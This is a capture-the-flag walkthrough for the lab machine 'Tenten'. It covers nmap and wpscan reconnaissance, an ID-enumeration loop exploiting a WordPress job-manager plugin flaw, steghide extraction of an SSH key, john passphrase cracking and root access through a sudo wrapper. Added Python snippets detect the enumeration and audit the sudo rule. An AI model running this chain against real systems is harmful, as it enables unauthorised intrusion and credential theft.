Machine: Tenten
OS: Linux
Target IP: 10.10.10.10
- Nmap
$ sudo nmap -A -Pn -sV -O -oN tenten_nmap.txt 10.10.10.10
Starting Nmap 7.50 ( https://nmap.org ) at 2017-08-22 14:05 IST
Nmap scan report for 10.10.10.10
Host is up (0.20s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 ec:f7:9d:38:0c:47:6f:f0:13:0f:b9:3b:d4:d6:e3:11 (RSA)
| 256 cc:fe:2d:e2:7f:ef:4d:41:ae:39:0e:91:ed:7e:9d:e7 (ECDSA)
|_ 256 8d:b5:83:18:c0:7c:5d:3d:38:df:4b:e1:a4:82:8a:07 (EdDSA)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: WordPress 4.7.3
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Job Portal – Just another WordPress site
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.8 (92%), Linux 3.12 (92%), Linux 3.13 (92%), Linux 3.13 or 4.2 (92%), Linux 3.16 (92%), Linux 3.16 - 4.6 (92%), Linux 3.18 (92%), Linux 3.2 - 4.8 (92%), Linux 3.8 - 3.11 (92%), Linux 4.4 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 236.28 ms 10.10.14.1
2 236.89 ms 10.10.10.10
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 43.47 seconds
- wpscan
$ sudo wpscan -u http://10.10.10.10 -e --log tenten_wpscan.txt
[+] We found 1 plugins:
[+] Name: job-manager - v7.2.5
| Latest version: 0.7.25 (up to date)
| Last updated: 2015-08-25T22:44:00.000Z
| Location: http://10.10.10.10/wp-content/plugins/job-manager/
| Readme: http://10.10.10.10/wp-content/plugins/job-manager/readme.txt
[+] Enumerating usernames ...
[+] Identified the following 2 user/s:
+----+-------+-------+
| Id | Login | Name |
+----+-------+-------+
| 1 | takis | takis |
| 2 | user1 | user1 |
+----+-------+-------+
- Complete output of wpscan is at https://pastebin.com/mR5tMvrh
- The job-manager plugin is affected by CVE-2015-6668
- Visit http://10.10.10.10/index.php/, click on Job Listing, then click on Apply
- The URL becomes http://10.10.10.10/index.php/jobs/apply/8/
- The number at the end is an ID from the WordPress MySQL database. Let's try to fuzz it.
$ for i in $(seq 1 15); do echo -n "$i: "; curl -s http://10.10.10.10/index.php/jobs/apply/$i/ | grep '<title>'; done
1: <title>Job Application: Hello world! – Job Portal</title>
2: <title>Job Application: Sample Page – Job Portal</title>
3: <title>Job Application: Auto Draft – Job Portal</title>
4: <title>Job Application – Job Portal</title>
5: <title>Job Application: Jobs Listing – Job Portal</title>
6: <title>Job Application: Job Application – Job Portal</title>
7: <title>Job Application: Register – Job Portal</title>
8: <title>Job Application: Pen Tester – Job Portal</title>
9: <title>Job Application: – Job Portal</title>
10: <title>Job Application: Application – Job Portal</title>
11: <title>Job Application: cube – Job Portal</title>
12: <title>Job Application: Application – Job Portal</title>
13: <title>Job Application: HackerAccessGranted – Job Portal</title>
14: <title>Job Application: Application – Job Portal</title>
15: <title>Job Application: Application – Job Portal</title>
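Detection logic for the ID walk above, added here as an example (not part of the original writeup): it parses Apache combined-format access-log lines and flags any client that touches many distinct `/jobs/apply/<id>/` values inside a short window. The log lines, client IPs and thresholds are constructed for the example.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed Apache access-log sample (not captured from the box): one client
# walks /jobs/apply/<id>/ sequentially the way the curl loop does, another
# client just opens one posting and submits an application.
SAMPLE_LOG = """\
10.10.14.5 - - [22/Aug/2017:14:10:01 +0530] "GET /index.php/jobs/apply/1/ HTTP/1.1" 200 5123 "-" "curl/7.52.1"
10.10.14.5 - - [22/Aug/2017:14:10:01 +0530] "GET /index.php/jobs/apply/2/ HTTP/1.1" 200 5101 "-" "curl/7.52.1"
10.10.14.5 - - [22/Aug/2017:14:10:02 +0530] "GET /index.php/jobs/apply/3/ HTTP/1.1" 200 5097 "-" "curl/7.52.1"
10.10.14.5 - - [22/Aug/2017:14:10:02 +0530] "GET /index.php/jobs/apply/4/ HTTP/1.1" 200 5090 "-" "curl/7.52.1"
10.10.14.5 - - [22/Aug/2017:14:10:03 +0530] "GET /index.php/jobs/apply/5/ HTTP/1.1" 200 5110 "-" "curl/7.52.1"
10.10.14.5 - - [22/Aug/2017:14:10:03 +0530] "GET /index.php/jobs/apply/6/ HTTP/1.1" 200 5110 "-" "curl/7.52.1"
10.10.14.9 - - [22/Aug/2017:14:11:40 +0530] "GET /index.php/jobs/apply/8/ HTTP/1.1" 200 5200 "-" "Mozilla/5.0"
10.10.14.9 - - [22/Aug/2017:14:12:05 +0530] "POST /index.php/jobs/apply/8/ HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# Combined-log-format fields we need, plus the apply endpoint with its numeric ID.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
APPLY_RE = re.compile(r"^/index\.php/jobs/apply/(?P<id>\d+)/?$")

def parse_apply_requests(log_text):
    """Yield (ip, timestamp, job_id) for every request to the apply endpoint."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        a = APPLY_RE.match(m["path"]) if m else None
        if not a:
            continue
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        yield m["ip"], ts, int(a["id"])

def find_enumerators(log_text, min_ids=5, window_s=60):
    """Return {ip: sorted_ids} for clients that touched at least min_ids distinct
    job IDs inside any window_s-second window; a normal applicant never does."""
    by_ip = defaultdict(list)
    for ip, ts, job_id in parse_apply_requests(log_text):
        by_ip[ip].append((ts, job_id))
    flagged = {}
    for ip, events in by_ip.items():
        events.sort()
        for start_ts, _ in events:
            ids = {jid for ts, jid in events
                   if 0 <= (ts - start_ts).total_seconds() <= window_s}
            if len(ids) >= min_ids:
                flagged[ip] = sorted(ids)
                break
    return flagged
```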
- The entry on line 13, HackerAccessGranted, looks interesting.
- According to the CVE, the WordPress directory structure for uploaded files is known as /wp-content/uploads/%year%/%month%/%filename%
- Visit http://10.10.10.10/wp-content/uploads/2017/04/HackerAccessGranted.jpg
- Note: There's a PoC in the CVE which will help you get the file. In my case I checked the file with .png, .jpeg and .jpg extensions manually.
- Download the image
$ wget http://10.10.10.10/wp-content/uploads/2017/04/HackerAccessGranted.jpg
- Use steghide with no passphrase
$ steghide extract -sf HackerAccessGranted.jpg
Enter passphrase:
wrote extracted data to "id_rsa".
- Use sshng2john
$ python sshng2john.py id_rsa > id_rsa.encrypted
- Use john to get passphrase
$ john id_rsa.encrypted --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH-ng [RSA/DSA 32/64])
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
superpassword (id_rsa)
1g 0:00:00:12 DONE (2017-08-22 16:28) 0.07782g/s 1116Kp/s 1116Kc/s 1116KC/s *7¡Vamos!
Session completed
- SSH
$ ssh -i id_rsa takis@10.10.10.10
takis@tenten:~$ sudo -l
Matching Defaults entries for takis on tenten:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User takis may run the following commands on tenten:
(ALL : ALL) ALL
(ALL) NOPASSWD: /bin/fuckin
takis@tenten:~$ fuckin
takis@tenten:~$ fuckin ls
user.txt
takis@tenten:~$ fuckin id
uid=1000(takis) gid=1000(takis) groups=1000(takis),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),117(lpadmin),118(sambashare)
takis@tenten:~$ strings /bin/fuckin
#!/bin/bash
$1 $2 $3 $4
takis@tenten:~$ sudo fuckin id
uid=0(root) gid=0(root) groups=0(root)
takis@tenten:~$ sudo fuckin cat /root/root.txt
XXXXXX
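An audit check for the sudo misconfiguration above, added here as an example rather than anything from the original writeup: it parses `sudo -l` output and flags NOPASSWD rules that point at ALL or at a script that executes its own arguments, which is exactly what the `$1 $2 $3 $4` wrapper does. The `sudo -l` text and wrapper body are constructed from what this page shows; `read_file` is an assumed callback so the check runs offline.

```python
import re

# Constructed 'sudo -l' output mirroring the two entries seen on the box.
SUDO_L_OUTPUT = """\
User takis may run the following commands on tenten:
    (ALL : ALL) ALL
    (ALL) NOPASSWD: /bin/fuckin
"""
# Wrapper body as shown by 'strings /bin/fuckin': it runs whatever it is given.
WRAPPER_BODY = "#!/bin/bash\n$1 $2 $3 $4\n"

# "(runas) TAG: TAG: command" lines as printed by sudo -l.
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s+(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+?)\s*$")
# A positional parameter, "$@" or "$*" in command position (optionally after
# exec) means the caller decides what the script executes.
ARG_EXEC_RE = re.compile(r'^\s*(?:exec\s+)?(?:"?\$[@*1-9]"?|\$\{[1-9@*]\})', re.M)

def parse_sudo_l(text):
    """Return [(runas, [tags], command)] for each rule line in 'sudo -l' output."""
    rules = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if m:
            rules.append((m["runas"].strip(), re.findall(r"[A-Z]+(?=:)", m["tags"]), m["cmd"]))
    return rules

def audit(sudo_l_text, read_file):
    """Flag passwordless rules that amount to 'run anything as root':
    NOPASSWD on ALL, or NOPASSWD on a script that executes its own arguments.
    read_file(path) returns the file's text, or None if unreadable/not a file."""
    findings = []
    for _runas, tags, cmd in parse_sudo_l(sudo_l_text):
        if "NOPASSWD" not in tags:
            continue
        if cmd == "ALL":
            findings.append((cmd, "NOPASSWD for ALL commands"))
            continue
        body = read_file(cmd.split()[0])
        if body is not None and body.startswith("#!") and ARG_EXEC_RE.search(body):
            findings.append((cmd, "script executes caller-supplied arguments"))
    return findings

def read_from_disk(path):
    """read_file callback for a real host: text of the file, or None."""
    try:
        with open(path, encoding="utf-8", errors="replace") as fh:
            return fh.read()
    except OSError:
        return None
```

On a real host call `audit(subprocess.check_output(["sudo", "-l"], text=True), read_from_disk)`; the constructed constants above exercise the same path offline.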